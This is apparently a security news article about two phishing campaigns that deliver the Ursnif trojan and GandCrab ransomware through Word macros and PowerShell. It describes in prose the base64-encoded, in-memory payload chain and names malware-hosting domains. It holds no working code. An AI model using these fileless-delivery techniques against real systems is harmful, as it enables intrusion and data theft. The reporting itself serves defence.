Researchers have discovered two distinct malware campaigns, one of which distributes the Ursnif data-stealing trojan and the GandCrab ransomware in the wild, and the other of which infects victims only with the Ursnif malware.
Even though both malware campaigns appear to be the work of different cybercriminal organizations, they share many similarities. Each attack begins with a phishing email containing a Microsoft Word attachment containing malicious macros and then uses Powershell to deliver fileless malware.
Ursnif is a data-stealing malware that typically steals sensitive information from compromised computers, including banking credentials, browsing history, keystrokes, system and process data, and the ability to deploy additional backdoors.
GandCrab is a widespread ransomware threat that, like every other ransomware on the market, encrypts files on an infected system and requires victims to pay a ransom in digital currency to decrypt them. GandCrab was discovered early last year. Its developers prefer DASH payments, which are more difficult to track.
MS Word documents plus VBS macros equal Ursnif and GandCrab infection
Security researchers at Carbon Black located approximately 180 variants of MS Word documents that target users with malicious VBS macros and discovered the first malware campaign distributing two malware threats.
If successfully executed, the malicious VBS macro launches a PowerShell script that employs a series of techniques to download and execute Ursnif and GandCrab on the targeted systems.
The base64-encoded PowerShell script executes the subsequent infection stage, which is responsible for downloading the system-compromising malware payloads.
The initial payload is a PowerShell one-liner that evaluates the architecture of the targeted system and then downloads an additional payload from the Pastebin website. This additional payload is executed in memory, making it difficult for conventional anti-virus techniques to detect its activities.
This PowerShell script is a minimally modified version of the Empire Invoke-PSInject module, according to researchers at Carbon Black. “The script will take a base64-encoded embedded PE [Portable Executable] file and inject it into the current PowerShell process.”
The final payload then installs a variant of the GandCrab ransomware on the victim’s system, preventing access until a ransom is paid in digital currency.
The malware also downloads an Ursnif executable from a remote server, which, once executed, will fingerprint the system, monitor web browser traffic to collect data, and then send it to the command and control (C&C) server of the attackers.
“During this campaign, however, numerous Ursnif variants were hosted on the bevendbrec.com website. Carbon Black was able to identify approximately 120 distinct Ursnif variants hosted on the iscondisth[.]com and bevendbrec[.]com domains “researchers stated.
MS Word documents plus VBS macros equal Ursnif data-stealing malware
Similarly, the second malware campaign discovered by security researchers at Cisco Talos utilizes a Microsoft Word document containing a malicious VBA macro to distribute an additional variant of the same Ursnif malware.
This malware attack compromises targeted systems in multiple stages, beginning with phishing emails, then executing malicious PowerShell commands to achieve fileless persistence, and finally downloading and installing the Ursnif virus that steals sensitive data.
“The [PowerShell] command consists of three parts. The first section creates a function for decoding base64-encoded PowerShell. The second section generates an array of bytes containing a malicious DLL “Researchers from Talos explained.
“The third section executes the base64 decode function created in the first section, passing an encoded string as the function’s parameter. The returned decoded PowerShell is executed by the Invoke-Expression (iex) shorthand function.”
Once the malware is executed on the victim’s computer, it collects information from the system, stores it in a CAB file format, and then transmits it to its command-and-control server over an HTTPS-secure connection.
In their blog post, Talos researchers have provided a list of indicators of compromise (IOCs), as well as the names of payload files dropped on compromised machines, that can be used to detect and stop the Ursnif malware before it infects your network.